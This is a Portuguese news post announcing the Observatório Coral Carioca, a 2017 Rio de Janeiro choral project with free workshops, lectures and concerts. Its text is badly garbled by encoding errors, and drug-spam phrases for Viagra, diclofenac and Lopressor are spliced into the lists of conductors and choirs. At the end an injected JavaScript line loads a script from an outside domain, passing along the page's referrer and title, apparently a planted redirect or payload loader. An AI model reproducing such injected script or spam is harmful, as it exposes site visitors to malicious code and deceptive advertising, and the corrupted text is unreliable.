Escrito por em 13 mar 2017 nas áreas Música coral, Notícia, Programação, Rio de Janeiro

ObservatA?rio Coral Carioca lanA�a espaA�o na internet e promove oficinas e palestras gratuitas, e shows a preA�os simbA?licos.

 

A histA?ria da arte vocal no Rio de Janeiro, consagrada por iniciativas como a inserA�A?o do canto nas escolas por meio de Heitor Villa-Lobos, ganha um importante capA�tulo, de marA�o a julho, por meio do ObservatA?rio Coral Carioca. Com patrocA�nio da Secretaria Municipal de Cultura e coordenaA�A?o e curadoria dos maestros lopressor generic side effects SA�rgio SansA?o, Jonas Hammar e Carlos Alberto Figueiredo, o projeto oferece palestras e oficinas, durante manhA?s e tardes, com entradas gratuitas, e apresentaA�A�es, no fim do dia, de dez grupos corais e vocais, a preA�os simbA?licos, no Teatro Gonzaguinha a�� Centro Municipal de Artes Calouste Gulbenkian, no Centro da capital.

AlA�m de extensa programaA�A?o, no dia 15 de marA�o, quarta-feira, entra no ar o site do ObservatA?rio Coral Carioca, espaA�o virtual de encontro e intercA?mbio entre aqueles que atuam junto a corais e grupos vocais, nA?o apenas na cidade do Rio de Janeiro, como tambA�m para alA�m de suas fronteiras. Permitindo nA?o sA? o cadastro de uma infinidade de grupos corais, cada qual disponibilizando suas informaA�A�es artA�sticas, caracterA�sticas, histA?rico e contatos, o site vai reunir tambA�m dez artigos temA?ticos inA�ditos, escritos por profissionais de renome, que serA?o lanA�ados nos dias das oficinas e concertos.

No Teatro Gonzaguinha, o projeto tem inA�cio no dia 18 de marA�o, sA?bado, com palestra e oficina ministradas pelo compositor e arranjador Paulo Malagutti Pauleira, um dos fundadores do CA�u da Boca, lendA?rio grupo dos anos 1980 e hoje integrante do MPB4. A�s 17h, sobe ao palco o grupo Boca Que Usa, de NiterA?i, formado por 21 integrantes, cujo repertA?rio abrange desde a mA?sica antiga atA� a contemporA?nea, de carA?ter religioso, secular, folclA?rico e popular, com prioridade para obras corais pouco executadas dentro do meio musical brasileiro.

JA? no dia 25, sA?bado, a cantora e arranjadora Regina Lucatto, que ajudou a fundar o cA�lebre Garganta Profunda, realiza a palestra O legado de Marcos Leite, sobre a obra e carreira do companheiro do grupo. O grupo Canto do Rio se apresenta A�s 17h, com direA�A?o e regA?ncia de Paulo Malagutti Pauleira, mostrando arranjos vocais originais de alguns clA?ssicos do antolA?gico a�?A?lbum brancoa�?, de JoA?o Gilberto, lanA�ado em 1973, apenas com voz, violA?o e uma leve bateria de Sonny Carr.

Grupo Canto do Rio (Foto: Rvonkruger)

 

Em abril, o projeto prossegue com palestra e oficina, no dia 8, sA?bado, ministradas por Glaucia Mancebo e Zeca Rodrigues, e show do grupo DA? o Tom. No dia 29, A� a vez de Reynaldo Puebla, que farA? palestra e oficina sobre coro cA?nico, com a apresentaA�A?o do Sacra Vox, A�s 17h. AtA� julho, renomados regentes e profissionais do canto estarA?o A� frente das oficinas e palestras, como Deco Fiori, Augusto Ordine online , Danilo Frederico, Patricia Costa, AndrA� Potasio, Lincoln Andrade purchase diclofenac sodium Buy e MaA�ra Martins. No palco do Teatro Gonzaguinha, vA?o se apresentar ainda os grupos Bebossa Kids, Pills SA?o Vicente a Cappella, AssociaA�A?o de Canto Coral eA� Buy Cheap filling viagra prescription on line Equale, entre outros.

O ObservatA?rio Coral Carioca busca aproximar um grande nA?mero de corais e grupos vocais, que, atA� entA?o, encontram-se pouco articulados entre si, tanto no A?mbito municipal como em uma perspectiva mais ampla. A ideia A� aproximar a comunidade coral, em prol de seu maior desenvolvimento, qualificaA�A?o e projeA�A?o artA�stica. Por representar, historicamente, uma potente ferramenta de musicalizaA�A?o, sociabilizaA�A?o e educaA�A?o para a cidadania, alA�m de tantos outros valores relacionados A� qualidade de vida da sociedade, o projeto nasce plural, atendendo tambA�m A� carA?ncia de cursos de formaA�A?o, oficinas, masterclasses, concertos, mostras, festivais; ou seja, tudo que permita uma maior circulaA�A?o e troca entre os a�?fazedoresa�? deste nicho tA?o rico de integraA�A?o sociocultural.

O projeto vem reforA�ar, ainda, que, democrA?tico e inclusivo em sua essA?ncia, o canto coral pode ser vivenciado por pessoas de todas as faixas etA?rias, diferentes nA�veis de conhecimento musical, pessoas experientes ou sem qualquer experiA?ncia em mA?sica. HA? grupos vocais e corais com as mais variadas propostas estA�ticas e artA�sticas e os mais variados objetivos: desde a profissionalizaA�A?o, atA� a prA?tica desta linguagem musical como possibilidade de lazer, diversA?o, socializaA�A?o, terapia, ampliaA�A?o de conhecimentos.

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Faça seu comentário